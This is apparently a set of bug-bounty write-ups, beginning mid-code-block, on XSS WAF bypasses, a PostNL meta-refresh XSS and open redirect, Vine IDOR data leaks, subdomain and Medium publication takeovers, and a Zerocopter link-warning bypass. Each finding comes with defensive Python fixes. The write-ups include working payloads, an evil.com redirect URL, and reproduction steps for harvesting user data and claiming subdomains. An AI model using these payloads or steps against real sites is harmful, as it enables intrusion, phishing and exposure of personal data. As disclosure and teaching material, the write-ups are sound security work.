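    return '<a data-channel="%s">Move to cart</a>' % html.escape(channel, quote=True)


if __name__ == '__main__':
    for hit in find_bypasses('xss\\"', 'onclick', '=\\"co\\u006efirm(domain)'):
        print(hit, '->', app_decodes(json_body(hit)))
    print(render_fixed(app_decodes(json_body('xss\\"onclick=\\"confirm(domain)'))))
```

The point to take from the output is that every single-character escape of onclick slips past the raw-body rule and decodes to the same string, so blocklisting spellings is a losing game; decoding before matching closes this particular gap, and encoding on output makes the reflected value harmless regardless of what the WAF catches.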

POST based XSS For unauthenticated users

Move the mouse pointer over “come to me” and then leave it, and boom 😎🤗
Since this is a POST request and there is no CSRF protection in place, I chained CSRF + XSS = P2 stored XSS for authenticated users 😎

CSRF + XSS = P2 Stored XSS for authenticated users 😎

Thanks for reading. Take a look at my YouTube channel for some POC I shared.

Cheers 😋😉


XSS bypass using META tag in realestate.postnl.nl

Hi readers,
Today I will write about a XSS Vulnerability I reported to the postnl.nl bug bounty Program.

Reflected XSS

A reflected XSS (also called a non-persistent XSS) is a type of XSS where the malicious script is bounced off the vulnerable website to the victim’s browser. The payload is typically passed in the query string of the URL, which makes exploitation as easy as tricking a user into clicking a link.

Vulnerable Endpoint: http://realestate.postnl.nl/?Lang=

To test for a normal reflected XSS I entered "><xsstest> in the Lang parameter, and in the source it was reflected unescaped inside a META tag, like this:

<meta name="language" content=""><xsstest>" />

Looks simple, right? Not so fast :’). I then entered "><img src=x> and got:

Forbidden Error WAF postnl

I tried many HTML tags and learned two things:

  • No valid HTML tag is allowed through.
  • I can add arbitrary attributes to the existing tag.

So I googled for meta tag attributes and got:

meta tag attributes

The http-equiv attribute caught my attention. I googled some more and learned that the META tag’s http-equiv directive lets you define the equivalent of an HTTP header in the HTML code, and that http-equiv can take the value refresh, which can be used to redirect a user to another page.

Then I input 0;http://evil.com"HTTP-EQUIV="refresh" and the response was

<meta name="language" content="0;http://evil.com"HTTP-EQUIV="refresh"" />

And I got redirected to evil.com, so I now had an open redirect. Next I tried to turn the refresh target into XSS: I input 0;javascript:alert(1)"HTTP-EQUIV="refresh" and the response was

Forbidden Error WAF postnl

It was blocked again, this time because of the keyword javascript in the payload. So I used a base64-encoded data: URI payload, 0;data:text/html;base64,PHNjcmlwdD5wcm9tcHQoIlJlZmxlY3RlZCBYU1MgQnkgUHJpYWwiKTwvc2NyaXB0Pg=="HTTP-EQUIV="refresh", and the response source was

<meta name="language" content="0;data:text/html;base64,PHNjcmlwdD5wcm9tcHQoIlJlZmxlY3RlZCBYU1MgQnkgUHJpYWwiKTwvc2NyaXB0Pg=="HTTP-EQUIV="refresh"" />

And now when I visit http://realestate.postnl.nl/?Lang=0%3Bdata%3Atext%2fhtml%3Bbase64%2CPHNjcmlwdD5wcm9tcHQoIlJlZmxlY3RlZCBYU1MgQnkgUHJpYWwiKTwvc2NyaXB0Pg%3D%3D%22HTTP-EQUIV%3D%22refresh%22 I get the XSS popup

XSS Popup in different origin from postnl

I reported it through their Zerocopter report form. They then deployed a fix by blacklisting the data:text/html;base64 keyword, the same way they had blacklisted the javascript keyword.

After the fix I could still perform an open redirect when a user visits http://realestate.postnl.nl/?Lang=0%3Bhttp%3A%2f%2fevil.com%22HTTP-EQUIV%3D%22refresh%22, and I confirmed this with them again

PostNL open redirect
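The root cause is that the Lang value is placed inside the content attribute without attribute-encoding it, so a double quote ends the attribute and whatever follows becomes new attributes; a keyword blacklist does not address that. The Python below is an added example, not PostNL’s code: it renders the meta tag both ways with the two payloads from this post and parses the result the way a browser would, to see whether an http-equiv attribute appeared.

```python
import html
from html.parser import HTMLParser

# The two payloads from this post, exactly as they were sent in the Lang parameter.
REDIRECT_PAYLOAD = '0;http://evil.com"HTTP-EQUIV="refresh'
XSS_PAYLOAD = ('0;data:text/html;base64,'
               'PHNjcmlwdD5wcm9tcHQoIlJlZmxlY3RlZCBYU1MgQnkgUHJpYWwiKTwvc2NyaXB0Pg=='
               '"HTTP-EQUIV="refresh')


def render_meta_vulnerable(lang):
    """Mirrors the behaviour seen above: the value is dropped into the content
    attribute unencoded, so a double quote ends the attribute early."""
    return f'<meta name="language" content="{lang}" />'


def render_meta_fixed(lang):
    """Attribute-encode the value; quote=True turns " into &quot; so the browser
    sees exactly one content attribute whatever the input contains."""
    return f'<meta name="language" content="{html.escape(lang, quote=True)}" />'


class MetaAttrCollector(HTMLParser):
    """Records the attributes the browser would see on each <meta> tag."""

    def __init__(self):
        super().__init__()
        self.meta_attrs = []

    def handle_startendtag(self, tag, attrs):
        self.handle_starttag(tag, attrs)

    def handle_starttag(self, tag, attrs):
        if tag == "meta":
            self.meta_attrs.append(dict(attrs))  # names are already lowercased


def meta_attribute_names(markup):
    """Attribute names of the first <meta> in markup, in document order."""
    parser = MetaAttrCollector()
    parser.feed(markup)
    parser.close()
    return list(parser.meta_attrs[0]) if parser.meta_attrs else []


def injected_http_equiv(markup):
    """Detection check: a language meta tag must never carry http-equiv.
    Returns its value if one was injected, else None."""
    parser = MetaAttrCollector()
    parser.feed(markup)
    parser.close()
    for attrs in parser.meta_attrs:
        if "http-equiv" in attrs:
            return attrs["http-equiv"]
    return None
```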

They fixed the issue again, listed my name on their Hall of Fame page & also offered to send some goodies 😍

Goodies offer from PostNL

Thanks for reading. If you have any query, ask me on Facebook.


How I earned 5040$ from Twitter by showing a way to harvest other users’ IP addresses

Hi guys,
This is one of my old findings that I am adding to my blog. Recently I disclosed a POC on how I was able to get every Vine user’s sensitive information, including phone number/IP address/email and more, which I reported to Twitter; they patched it and rewarded me 7560$. Those who missed it can read the original report here.

Today I am going to disclose another information disclosure vulnerability that I reported to the Twitter security team through their bug bounty program on HackerOne; they rewarded me 5040$ for this report.

While testing Vine API endpoints I noticed that an endpoint used in the Vine repost mechanism has a parameter named "ipAddress" with a plain numeric value like 2130706433. We all know IP addresses look like 127.0.0.1, so the "ipAddress" value looked invalid. When I searched for it on Google I learned that the value is valid: it is the IP address converted to long/decimal format. So I used an online converter tool and got the real IP.

Vulnerable Endpoint: https://vine.co/api/timelines/users/<POST_ID>

Reproduce
  • To reproduce this issue the victim user has to have reposted a Vine in their timeline, and a lot of Vine users have reposted many Vine posts in their timelines.
  • So copy a reposted Vine’s POST_ID, place it in the endpoint and visit it. Example: https://vine.co/api/timelines/users/1293308695089926144
  • When I visited the link I got a response like the one below (the sensitive contents were removed by the Twitter security team):
    “repost”: { “username”: “██████”, “verified”: 0, “vanityUrls”: [], “created”: “█████”, “repostId”: ████████, “avatarUrl”: “██████”, “userId”: ████, “user”: { “username”: “█████████”, “verified”: 0, “vanityUrls”: [], “avatarUrl”: “█████████”, “userId”: ████, “private”: 0, “location”: █████████ }, “flags|platform_lo”: 1, “postId”: ███, “ipAddress”: 2130706433 , “flags|platform_hi”: 1 }
  • As you can see, the ipAddress value is in the converted form; just use the online tool mentioned above to convert it back into a valid IP address.

I reported this issue on Jan 26th and they paid me 5040$ for it on Feb 25th.

5040$ from Twitter

Thanks for reading. Happy Hunting.


Vine User’s Private information disclosure

What is Vine?

Vine was an American social networking short-form video hosting service where users could share six or seven second-long, looping video clips. It was founded in June 2012; American microblogging website Twitter acquired it in October 2012, well before its official release on January 24, 2013.

Today I will write about a critical insecure direct object reference (IDOR) vulnerability leading to information disclosure, which allowed me to get any Vine user’s sensitive information, including IP address/phone number/email.
I reported this bug to the Twitter security team through their bug bounty program on HackerOne and they rewarded me 7560$ for this report.

7560$ reward from Twitter Vine

Vine mentioned this vulnerability in a post on the Vine blog, and HackerOne also mentioned it in the HackerOne Zerodaily newsletter.

Vulnerable Endpoint: https://vine.co/api/users/profiles/<User_Id>

I was testing Vine domains for something interesting when I noticed an endpoint whose response contained all of my account’s information. I thought this was normal, as many sites have this type of endpoint showing the logged-in user’s information, so I thought I would try to exploit it through CORS if that was misconfigured. But a CORS policy was in place. Then I changed the user-id value to a random number and was shocked to see someone else’s user information in front of me. By changing the user_id value I was able to get all information about that Vine user.

Reproduce
  • Choose any user whose information you want and collect their User_ID.
  • Now place the User_ID in the https://vine.co/api/users/profiles/<User Id> endpoint and visit it.
  • You will get a response in the body:
    {“code”: “”, “data”: {“followerCount”: 16271364, “includePromoted”: 1, “captchaSucceeded”: 0, “recordComment”: null, “locale”: “iUS”, “shareUrl”: “https://vine.co/████████”, “hiddenPhoneNumber”: 0, “notPorn”: 0, “userId”: █████████, “private”: 0, “likeCount”: null, “commentCount”: null, “platforms”: [“android”, “ios”], “postCount”: null, “profileBackground”: “0x33ccbf”, “suspended”: null, “hiddenFacebook”: 0, “verifiedEmail”: 0, “explicitContent”: 0, “dmcaStrikeCount”: 0, “flaggedCount”: 7579, “verified”: 1, “loopCount”: 6132344784, “avatarUrl”: “http://v.cdn.vine.co/r/avatars/████████████████████████████████████████.jpg?versionId=JIjnvXTkbWpjvk7glYZIXDqt187couHr”, “authoredPostCount”: 598, “review_result_illegal_review”: 0, “review_result_ok”: 0, “review”: null, “suspendedBy”: null, “twitterId”: ████████, “phoneNumber”: “██████████”, “location”: “Los Angeles California”, “notifyActivity”: 1, “facebookConnected”: 1, “explicitContentAdmin”: 0, “statsTags”: null, “hiddenEmail”: 0, “unflaggable”: 0, “username”: “████████”, “modified”: “2017–01–29T01:24:00.000000”, “userIdStr”: “████████”, “twitterIdStr”: “████████”, “vanityUrls”: [“kingbach”], “remixDisabled”: 0, “deleted”: null, “categories”: null, “released”: 0, “loopVelocity”: null, “strikeCounts”: [{“count”: 0, “strikeType”: “SEVERE_POLICY_VIOLATION”}, {“count”: 0, “strikeType”: “DMCA”}, {“count”: 0, “strikeType”: “SENSITIVE”}, {“count”: 0, “strikeType”: “POSSIBLY_ILLEGAL”}, {“count”: 0, “strikeType”: “GRAPHIC_NON_VIOLATING”}, {“count”: 0, “strikeType”: “ESC”}], “uploadHD”: 1, “verifiedPhoneNumber”: 1, “hiddenTwitter”: 0, “vineVerified”: 1, “notifyMessages”: 1, “needsPhoneVerification”: 0, “repostCount”: null, “twitterScreenname”: “██████”, “secondaryColor”: “0x33ccbf”, “twitterVerified”: 1, “captchaRequired”: 0, “edition”: null, “acceptsOutOfNetworkConversations”: 1, “disableAddressBook”: 1, “description”: “Instagram/Twitter/Shots/SnapChat- @███ For booking go to the library”, “escStrikeCount”: 0, “review_result_explicit”: 0, “notificationsLastViewed”: “2016–04–26T21:03:35.000000”, “email”: “████████”, “hideFromPopular”: 0, “admin”: 0, “contentReview”: 0, “created”: “2013–04–13T19:30:31.000000”, “review_result_illegal_confirmed”: 0, “followingCount”: null, “lastLogin”: “2016–12–13T23:29:40.000000”, “escUser”: 0, “ipAddress”: “██████”, “twitterConnected”: 1}, “success”: true, “error”: “”}
  • Take a closer look at the response and you will find a lot of private info about the user [all such information was removed by Twitter security as it belongs to other users].
  • Some of them are:
    “platforms”: [“android”, “ios”]
    “flaggedCount”: 7579
    “twitterId”: “█████████”
    “phoneNumber”: “█████”
    “location”: “Los Angeles California”
    “modified”: “2017–01–29T01:24:00.000000”
    “notificationsLastViewed”: “2016–04–26T21:03:35.000000”
    “email”: “█████████”
    “created”: “2013–04–13T19:30:31.000000”
    “lastLogin”: “2016–12–13T23:29:40.000000”
    “ipAddress”: “█████”

Even ipAddress/email/phone are disclosed here, so an attacker could use this information for malicious attacks against any Vine user, and could dump every user’s information.

This also affects Twitter users, as Vine users can log in to Vine services with their Twitter account. I found the same vulnerability in another bug bounty program, on Edmodo’s website.
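The fix for both Vine endpoints on this page (the profile endpoint here and the repost object in the previous post) is the same: compare the requested userId with the caller, and serialize from an allow-list of public fields instead of dumping the stored record. This is an added example, not Vine’s code; the store, the values and the repost object are constructed, with field names taken from the redacted responses above.

```python
# Constructed sample store in the shape of the redacted profile response above;
# field names come from the write-up, every value is made up.
USERS = {
    1001: {"userId": 1001, "username": "alice", "verified": 1, "vanityUrls": ["alice"],
           "avatarUrl": "https://cdn.example/alice.jpg", "location": "Los Angeles California",
           "followerCount": 16271364, "description": "For booking go to the library",
           # account/server-side data: only the owner should ever receive these
           "email": "alice@example.com", "phoneNumber": "+15550100",
           "ipAddress": "203.0.113.7", "twitterId": 424242, "platforms": ["android", "ios"],
           "lastLogin": "2016-12-13T23:29:40.000000",
           "notificationsLastViewed": "2016-04-26T21:03:35.000000"},
    1002: {"userId": 1002, "username": "bob", "verified": 0, "vanityUrls": [],
           "avatarUrl": "https://cdn.example/bob.jpg", "location": "", "followerCount": 3,
           "description": "", "email": "bob@example.com", "phoneNumber": "+15550199",
           "ipAddress": "198.51.100.9", "twitterId": 515151, "platforms": ["ios"],
           "lastLogin": "2017-01-01T00:00:00.000000", "notificationsLastViewed": None},
}

# Allow-list: the only profile fields a third party is entitled to see.
PUBLIC_FIELDS = frozenset({"userId", "username", "verified", "vanityUrls",
                           "avatarUrl", "location", "followerCount", "description"})

# Constructed repost object in the shape of the previous post's response; the
# nested user and the decimal ipAddress (2130706433 is 127.0.0.1) are the point.
REPOST = {"username": "bob", "verified": 0, "repostId": 7, "postId": 9,
          "user": {"username": "bob", "userId": 1002, "location": "", "private": 0},
          "ipAddress": 2130706433, "flags|platform_lo": 1, "flags|platform_hi": 1}
REPOST_PUBLIC = PUBLIC_FIELDS | {"repostId", "postId", "user"}


def profile_vulnerable(requester_id, target_id):
    """Reconstruction of the flaw (an assumption about the original code): the
    caller must be logged in, but the requested userId is never compared with
    the caller, and the stored record is serialized wholesale."""
    if requester_id not in USERS:
        raise PermissionError("login required")
    return dict(USERS[target_id])


def public_view(obj, allowed=PUBLIC_FIELDS):
    """Serialize only allow-listed keys, recursing into nested dicts and lists."""
    if isinstance(obj, dict):
        return {k: public_view(v, allowed) for k, v in obj.items() if k in allowed}
    if isinstance(obj, list):
        return [public_view(v, allowed) for v in obj]
    return obj


def profile_fixed(requester_id, target_id):
    """Owner gets the full record; any other caller gets the public view only."""
    if requester_id not in USERS:
        raise PermissionError("login required")
    record = USERS[target_id]  # KeyError for an unknown id is the right outcome
    return dict(record) if requester_id == target_id else public_view(record)


def leaked_private_fields(response):
    """Audit helper: non-public keys that reached a third-party response."""
    return sorted(set(response) - PUBLIC_FIELDS)
```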

Thanks for reading. Happy Hunting. 😀


Subdomain takeover due to misconfigured project settings

Hi readers,
Today I will write about subdomain takeover. It is a common security issue that is really a developer’s mistake: an unused/unclaimed third-party service DNS CNAME record is left in place for one of their subdomains, and hackers can claim that subdomain with the help of the external service it points to, which can lead to serious issues. You can learn more about subdomain takeover on the Detectify blog.

While testing flock.com I found a domain, flock.co, which belongs to the Flock company. So I started looking at its subdomains and found newdev.flock.co; when I visited it in the browser I got an error like the screenshot below

Project doesn’t exist error

This caught my attention, so I checked the DNS records for this domain.

$ dig newdev.flock.co

; <<>> DiG 9.10.6 <<>> newdev.flock.co
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 13182
;; flags: qr rd ra; QUERY: 1, ANSWER: 4, AUTHORITY: 0, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 512
;; QUESTION SECTION:
;newdev.flock.co. IN A

;; ANSWER SECTION:
newdev.flock.co. 299 IN CNAME cname.readme.io.
cname.readme.io. 299 IN CNAME readme-cache-prod-1392018356.us-east-1.elb.amazonaws.com.
readme-cache-prod-1392018356.us-east-1.elb.amazonaws.com. 59 IN A 52.0.214.29
readme-cache-prod-1392018356.us-east-1.elb.amazonaws.com. 59 IN A 52.5.249.117

;; Query time: 69 msec
;; SERVER: 8.8.8.8#53(8.8.8.8)
;; WHEN: Mon Jul 09 04:58:06 +06 2018
;; MSG SIZE rcvd: 175

From the above record we can see that the subdomain is a CNAME to cname.readme.io. So I started reading the custom domain documentation on the readme.io website to understand how it works. From their documentation I understood that

  • You need a subdomain pointing to your readme.io subdomain, like yoursubdomain.readme.io.
  • Your subdomain should be configured in the domain settings on the following page: https://dash.readme.io/project/<project_Name>/v1.0/domains

So to take over the subdomain I needed to check whether cname.readme.io was already claimed. Unfortunately, it was 🙁. But I have seen that many such services don’t force users to verify their ownership of a domain with a CNAME or TXT record other than the one pointing at their service subdomain, so there was still hope. I opened an account on readme.io and got the subdomain newdev.readme.io. Then I went to the domain settings at https://dash.readme.io/project/newdev/v1.0/domains, entered newdev.flock.co in the Custom Domain field and saved the changes. Now when I visited newdev.flock.co it redirected me to http://newdev.flock.co/inactive, a page saying Not Yet Active

Subdomain Takeover by Prial P0C

This page shows because I am using a trial account. In the page title in the screenshot above you can see the project name I used when creating the project. So this domain is now serving my content from the newdev.readme.io project page.

How to avoid such issues?: Always keep your DNS records up to date, and remove CNAME or any other DNS records that are no longer in use. If you find a security vulnerability, feel free to contact them via [email protected]com
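A defender’s version of the check done by hand above, as an added example that is neither Flock’s nor readme.io’s code: it walks the CNAME chain of each hostname, flags chains that pass through a known multi-tenant service, and looks for that service’s unclaimed-project fingerprint in the response body. The zone data and HTTP bodies are constructed to mirror the dig output and the error page above, and fetch_body is injected so the check runs offline.

```python
# Multi-tenant services that serve customer content through a CNAME, with the
# body text they return for a hostname no project has claimed. The readme.io
# entry is the error page seen above; the table is otherwise constructed.
SERVICE_FINGERPRINTS = {
    "cname.readme.io.": "Project doesn't exist",
}

# Constructed zone data mirroring the dig output above (trailing dots as in DNS).
CNAME_RECORDS = {
    "newdev.flock.co.": "cname.readme.io.",
    "cname.readme.io.": "readme-cache-prod-1392018356.us-east-1.elb.amazonaws.com.",
    "docs.example.": "cname.readme.io.",   # claimed project: not dangling
    "www.example.": "example.",            # points at our own apex: no service involved
}

# Constructed HTTP bodies standing in for a live GET of http://<hostname>/.
SAMPLE_BODIES = {
    "newdev.flock.co.": "<h1>Project doesn't exist</h1>",
    "docs.example.": "<title>Example Docs</title>",
}


def cname_chain(name, records=CNAME_RECORDS, limit=8):
    """Follow CNAMEs from name until a non-CNAME host, a loop or the hop limit."""
    chain, seen = [name], {name}
    while chain[-1] in records and len(chain) <= limit:
        nxt = records[chain[-1]]
        if nxt in seen:            # CNAME loop: stop rather than spin
            break
        chain.append(nxt)
        seen.add(nxt)
    return chain


def matching_service(chain):
    """First hop after the name itself that is a known multi-tenant service."""
    for host in chain[1:]:
        if host in SERVICE_FINGERPRINTS:
            return host
    return None


def dangling_subdomains(names, fetch_body, records=CNAME_RECORDS):
    """Return (name, service) pairs where name CNAMEs to a known service AND the
    service answers with its unclaimed page. fetch_body(hostname) -> str is
    injected so the check can run offline; in production it performs the GET."""
    findings = []
    for name in names:
        service = matching_service(cname_chain(name, records))
        if service and SERVICE_FINGERPRINTS[service] in fetch_body(name):
            findings.append((name, service))
    return findings


if __name__ == "__main__":
    print(dangling_subdomains(list(CNAME_RECORDS), lambda h: SAMPLE_BODIES.get(h, "")))
```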

Thanks for reading.


Unclaimed Medium Publication takeover in WeTransfer

Today I will share a security issue I found in WeTransfer. WeTransfer has a paid bug bounty program on Zerocopter, so I started testing their sites. While I was brute-forcing directories on wetransfer.com with the DIRB script I found some directories that redirected users to Medium publication links. They looked like

    https://wetransfer.com/blogger (CODE:301|SIZE:0)
    (Location: 'https://medium.com/wetransferger')
    https://wetransfer.com/bloggers (CODE:301|SIZE:0)
    (Location: 'https://medium.com/wetransfergers')
    https://wetransfer.com/blogindex (CODE:301|SIZE:0)
    (Location: 'https://medium.com/wetransferindex')
    https://wetransfer.com/blogs (CODE:301|SIZE:0)
    (Location: 'https://medium.com/wetransfers')
    https://wetransfer.com/blogspot (CODE:301|SIZE:0)
    (Location: 'https://medium.com/wetransferspot')
    https://wetransfer.com/blog_ajax (CODE:301|SIZE:0)
    (Location: 'https://medium.com/wetransfer_ajax')
    https://wetransfer.com/blog_inlinemod (CODE:301|SIZE:0)
    (Location: 'https://medium.com/wetransfer_inlinemod')
    https://wetransfer.com/blog_report (CODE:301|SIZE:0)
    (Location: 'https://medium.com/wetransfer_report')
    https://wetransfer.com/blog_search (CODE:301|SIZE:0)
    (Location: 'https://medium.com/wetransfer_search')
    https://wetransfer.com/blog_usercp (CODE:301|SIZE:0)
    (Location: 'https://medium.com/wetransfer_usercp')

When I visited the location link https://medium.com/wetransferger I got an error like the screenshot below

404 error on medium

I then went to https://medium.com/me/publications, created a new publication with the same name, wetransferger, and got the publication link under my control; I was able to place anything on the publication, like the screenshot below

Publication Takeover P0C By Prial

Now whenever a user visits https://wetransfer.com/blogger it takes them to my Medium publication. I was able to claim 5 unclaimed publications. The others were not exploitable because they used an _ (underscore) in the Medium link, and Medium does not allow _ (underscore) in a publication link. I reported this issue to the WeTransfer bug bounty program and they rewarded me with 100 Euro + a 1-year WeTransfer Plus account.

WeTransfer’s response

Conclusion: If you link to Medium publications from your site, make sure each link is valid and the publication is claimed by you.

Thanks For Reading.


External link warning page bypass in Zerocopter

Description:

zerocopter.com is a bug bounty platform for ethical hackers, just like HackerOne. In Zerocopter reports users can use Markdown, and they are also allowed to include external links. If a user clicks an external link in a report it takes them to an external-link warning page like the screenshot below

Zerocopter external warning page

But I was able to bypass the external warning page and redirect a user to an external link without any warning by using this Markdown

<http:1249723505> 
[Click Me](http:1249723505)

Note: In the above Markdown, 1249723505 is the IP of google.com [74.125.68.113] converted into long/decimal form using this tool.

Reproduce
  • In a report I used the Markdown [Click Me](http://google.com) and the response was:
    <a href="/external_redirect?href=http%3A%2F%2Fgoogle.com" rel="noreferrer" target="_blank" title="">Click Me</a>
  • Then I used the Markdown [Click Me](http://74.125.68.113) and the response was:
    <a href="/external_redirect?href=http%3A%2F%2F74.125.68.113" rel="noreferrer" target="_blank" title="">Click Me</a>
  • Then I thought I would mess with the protocol and changed the Markdown to [Click Me](http:/google.com), but still no bypass.
  • Then I was about to use [Click Me](http:google.com) but accidentally used [Click Me](http:google), forgetting the .com TLD at the end of the domain name, and I noticed a glimmer of hope in the response:
    <a href="http%3Agoogle" rel="noreferrer" target="_blank" title="">Click Me</a>
  • Analyzing the behaviour, I realised that a domain name like http:google bypasses the external warning page. Then I remembered the IP long/decimal encoding. So I used this tool to encode google.com’s IP to long/decimal, the final Markdown became [Click Me](http:1249723505), and bingo 😎
    <a href="http%3A1249723505" rel="noreferrer" target="_blank" title="">Click Me</a>
  • Now when a user clicks the link it takes them directly to google.com instead of the external warning page. I reported this to Zerocopter on their responsible disclosure page; they fixed it and sent me a cool T-shirt and stickers as a reward.

Cool T-shirt and stickers as reward
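The bypass works because the link was classified as internal whenever it had no //authority part, even though browsers treat http:google and http:1249723505 as http://google/ and http://74.125.68.113/. The Python below is an added example, not Zerocopter’s code: a reconstruction of that naive check (an assumption about the original) beside a fixed classifier that parses the URL, recovers the host from a scheme-only link, and converts an all-digit host from long/decimal back to dotted form (the same conversion used for the Vine ipAddress field earlier on this page). SITE_HOST is assumed for the examples.

```python
import ipaddress
from urllib.parse import quote, urlsplit

SITE_HOST = "zerocopter.com"  # assumed first-party host for the examples


def decimal_to_ip(value):
    """Turn a 'long/decimal' IPv4 such as 1249723505 back into dotted form."""
    return str(ipaddress.IPv4Address(int(value)))


def is_external_naive(href):
    """Reconstruction of the bypassed check (an assumption, not the platform's
    code): a link only counts as external when it has an //authority part."""
    parts = urlsplit(href)
    return bool(parts.netloc) and parts.netloc.lower() != SITE_HOST


def is_external_fixed(href):
    """Classify the way a browser resolves the link: any scheme makes it absolute,
    the host of a scheme-only link (http:google) is the first path segment, and an
    all-digit host is a decimal IPv4. Only scheme-less, authority-less links are internal."""
    parts = urlsplit(href)
    if parts.scheme and parts.scheme not in ("http", "https"):
        return True                      # javascript:, data:, ... never go straight through
    if not parts.scheme and not parts.netloc:
        return False                     # e.g. /reports/1
    host = (parts.hostname or parts.path.split("/")[0]).lower()
    if host.isdigit():
        try:
            host = decimal_to_ip(host)   # http:1249723505 -> 74.125.68.113
        except ValueError:
            return True                  # out of IPv4 range: refuse to treat as ours
    return host != SITE_HOST


def render_link(text, href, classifier):
    """Render a Markdown link target the way the report page above does:
    external targets are wrapped in /external_redirect?href=<encoded>."""
    target = href
    if classifier(href):
        target = "/external_redirect?href=" + quote(href, safe="")
    return f'<a href="{target}" rel="noreferrer" target="_blank">{text}</a>'
```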

Thanks for reading. Hope this will be helpful for you guys.